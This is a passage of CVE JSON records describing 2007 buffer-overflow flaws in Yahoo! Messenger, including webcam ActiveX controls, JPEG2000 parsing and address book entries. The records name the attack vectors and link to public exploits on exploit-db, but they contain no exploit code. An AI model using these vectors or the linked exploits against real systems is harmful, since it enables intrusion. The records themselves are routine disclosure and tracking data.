"dateReserved": "2007-08-23T00:00:00",
"dateUpdated": "2024-08-07T15:01:09.859Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-4391 (GCVE-0-2007-4391)
Vulnerability from cvelistv5 – Published: 2007-08-17 22:00 – Updated: 2024-08-07 14:53
VLAI?
Summary
Heap-based buffer overflow in Kakadu kdu_v32m.dll in Yahoo! Messenger 8.1.0.413 allows remote attackers to cause a denial of service (application crash) via a certain length field in JPEG2000 data, as demonstrated by sending an "invite to view my webcam" request, and then injecting a DLL into the attacker's peer Yahoo! Messenger application when this request is accepted.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:53:55.679Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ADV-2007-2917",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2917"
},
{
"name": "yahoo-messenger-webcam-bo(36115)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36115"
},
{
"name": "VU#515968",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/515968"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.team509.com/expyahoo.rar"
},
{
"name": "26501",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/26501"
},
{
"name": "25330",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/25330"
},
{
"name": "38221",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/38221"
},
{
"name": "1018586",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1018586"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-08-12T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Heap-based buffer overflow in Kakadu kdu_v32m.dll in Yahoo! Messenger 8.1.0.413 allows remote attackers to cause a denial of service (application crash) via a certain length field in JPEG2000 data, as demonstrated by sending an \"invite to view my webcam\" request, and then injecting a DLL into the attacker\u0027s peer Yahoo! Messenger application when this request is accepted."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "ADV-2007-2917",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2917"
},
{
"name": "yahoo-messenger-webcam-bo(36115)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36115"
},
{
"name": "VU#515968",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/515968"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.team509.com/expyahoo.rar"
},
{
"name": "26501",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/26501"
},
{
"name": "25330",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/25330"
},
{
"name": "38221",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/38221"
},
{
"name": "1018586",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1018586"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-4391",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Heap-based buffer overflow in Kakadu kdu_v32m.dll in Yahoo! Messenger 8.1.0.413 allows remote attackers to cause a denial of service (application crash) via a certain length field in JPEG2000 data, as demonstrated by sending an \"invite to view my webcam\" request, and then injecting a DLL into the attacker\u0027s peer Yahoo! Messenger application when this request is accepted."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "ADV-2007-2917",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2917"
},
{
"name": "yahoo-messenger-webcam-bo(36115)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36115"
},
{
"name": "VU#515968",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/515968"
},
{
"name": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/",
"refsource": "MISC",
"url": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/"
},
{
"name": "http://www.team509.com/expyahoo.rar",
"refsource": "MISC",
"url": "http://www.team509.com/expyahoo.rar"
},
{
"name": "26501",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/26501"
},
{
"name": "25330",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/25330"
},
{
"name": "38221",
"refsource": "OSVDB",
"url": "http://osvdb.org/38221"
},
{
"name": "1018586",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1018586"
},
{
"name": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749",
"refsource": "MISC",
"url": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-4391",
"datePublished": "2007-08-17T22:00:00",
"dateReserved": "2007-08-17T00:00:00",
"dateUpdated": "2024-08-07T14:53:55.679Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3928 (GCVE-0-2007-3928)
Vulnerability from cvelistv5 – Published: 2007-07-21 00:00 – Updated: 2024-08-07 14:37
VLAI?
Summary
Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users to execute arbitrary code via a long e-mail address in an address book entry. NOTE: this might overlap CVE-2007-3638.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:37:04.515Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "26066",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/26066"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.xdisclose.com/advisory/XD100002.html"
},
{
"name": "24926",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24926"
},
{
"name": "1018398",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1018398"
},
{
"name": "2906",
"tags": [
"third-party-advisory",
"x_refsource_SREASON",
"x_transferred"
],
"url": "http://securityreason.com/securityalert/2906"
},
{
"name": "yahoo-messenger-address-book-bo(35434)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35434"
},
{
"name": "20070716 Yahoo Messenger 8.1 Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064669.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-07-16T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users to execute arbitrary code via a long e-mail address in an address book entry. NOTE: this might overlap CVE-2007-3638."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "26066",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/26066"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.xdisclose.com/advisory/XD100002.html"
},
{
"name": "24926",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24926"
},
{
"name": "1018398",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1018398"
},
{
"name": "2906",
"tags": [
"third-party-advisory",
"x_refsource_SREASON"
],
"url": "http://securityreason.com/securityalert/2906"
},
{
"name": "yahoo-messenger-address-book-bo(35434)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35434"
},
{
"name": "20070716 Yahoo Messenger 8.1 Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064669.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3928",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users to execute arbitrary code via a long e-mail address in an address book entry. NOTE: this might overlap CVE-2007-3638."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "26066",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/26066"
},
{
"name": "http://www.xdisclose.com/advisory/XD100002.html",
"refsource": "MISC",
"url": "http://www.xdisclose.com/advisory/XD100002.html"
},
{
"name": "24926",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24926"
},
{
"name": "1018398",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1018398"
},
{
"name": "2906",
"refsource": "SREASON",
"url": "http://securityreason.com/securityalert/2906"
},
{
"name": "yahoo-messenger-address-book-bo(35434)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35434"
},
{
"name": "20070716 Yahoo Messenger 8.1 Buffer Overflow",
"refsource": "FULLDISC",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064669.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3928",
"datePublished": "2007-07-21T00:00:00",
"dateReserved": "2007-07-20T00:00:00",
"dateUpdated": "2024-08-07T14:37:04.515Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3638 (GCVE-0-2007-3638)
Vulnerability from cvelistv5 – Published: 2007-07-10 00:00 – Updated: 2024-08-07 14:21
VLAI?
Summary
Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users, who are listed in an address book, to execute arbitrary code via unspecified vectors, aka ZD-00000005. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:21:36.599Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "24784",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24784"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-07-02T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users, who are listed in an address book, to execute arbitrary code via unspecified vectors, aka ZD-00000005. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2007-07-27T09:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "24784",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24784"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3638",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users, who are listed in an address book, to execute arbitrary code via unspecified vectors, aka ZD-00000005. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "24784",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24784"
},
{
"name": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?",
"refsource": "MISC",
"url": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3638",
"datePublished": "2007-07-10T00:00:00",
"dateReserved": "2007-07-09T00:00:00",
"dateUpdated": "2024-08-07T14:21:36.599Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3147 (GCVE-0-2007-3147)
Vulnerability from cvelistv5 – Published: 2007-06-11 18:00 – Updated: 2024-08-07 14:05
VLAI?
Summary
Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method. NOTE: some of these details are obtained from third party information.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:05:28.302Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20070606 Yahoo 0day ActiveX Webcam Exploit",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html"
},
{
"name": "4042",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/4042"
},
{
"name": "24354",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24354"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"name": "VU#949817",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/949817"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"name": "ADV-2007-2094",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"name": "25547",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25547"
},
{
"name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"name": "1018204",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://securitytracker.com/id?1018204"
},
{
"name": "yahoo-webcam-upload-bo(34758)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34758"
},
{
"name": "24341",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24341"
},
{
"name": "1018203",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1018203"
},
{
"name": "2809",
"tags": [
"third-party-advisory",
"x_refsource_SREASON",
"x_transferred"
],
"url": "http://securityreason.com/securityalert/2809"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-06-06T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method. NOTE: some of these details are obtained from third party information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-16T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20070606 Yahoo 0day ActiveX Webcam Exploit",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html"
},
{
"name": "4042",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/4042"
},
{
"name": "24354",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24354"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"name": "VU#949817",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/949817"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"name": "ADV-2007-2094",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"name": "25547",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25547"
},
{
"name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"name": "1018204",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://securitytracker.com/id?1018204"
},
{
"name": "yahoo-webcam-upload-bo(34758)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34758"
},
{
"name": "24341",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24341"
},
{
"name": "1018203",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1018203"
},
{
"name": "2809",
"tags": [
"third-party-advisory",
"x_refsource_SREASON"
],
"url": "http://securityreason.com/securityalert/2809"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3147",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method. NOTE: some of these details are obtained from third party information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20070606 Yahoo 0day ActiveX Webcam Exploit",
"refsource": "FULLDISC",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html"
},
{
"name": "4042",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/4042"
},
{
"name": "24354",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24354"
},
{
"name": "http://research.eeye.com/html/advisories/upcoming/20070605.html",
"refsource": "MISC",
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"name": "VU#949817",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/949817"
},
{
"name": "http://messenger.yahoo.com/security_update.php?id=060707",
"refsource": "CONFIRM",
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"name": "ADV-2007-2094",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"name": "25547",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25547"
},
{
"name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"name": "1018204",
"refsource": "SECTRACK",
"url": "http://securitytracker.com/id?1018204"
},
{
"name": "yahoo-webcam-upload-bo(34758)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34758"
},
{
"name": "24341",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24341"
},
{
"name": "1018203",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1018203"
},
{
"name": "2809",
"refsource": "SREASON",
"url": "http://securityreason.com/securityalert/2809"
},
{
"name": "http://research.eeye.com/html/advisories/published/AD20070608.html",
"refsource": "MISC",
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3147",
"datePublished": "2007-06-11T18:00:00",
"dateReserved": "2007-06-11T00:00:00",
"dateUpdated": "2024-08-07T14:05:28.302Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3148 (GCVE-0-2007-3148)
Vulnerability from cvelistv5 – Published: 2007-06-11 18:00 – Updated: 2024-08-07 14:05
VLAI?
Summary
Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:05:29.296Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "4043",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/4043"
},
{
"name": "yahoo-webcam-viewer-bo(34759)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34759"
},
{
"name": "37081",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/37081"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"name": "24355",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24355"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"name": "ADV-2007-2094",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"name": "25547",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25547"
},
{
"name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"name": "1018204",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://securitytracker.com/id?1018204"
},
{
"name": "20070607 2nd Yahoo 0day ActiveX Exploit",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.html"
},
{
"name": "24341",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24341"
},
{
"name": "1018203",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1018203"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
},
{
"name": "VU#932217",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
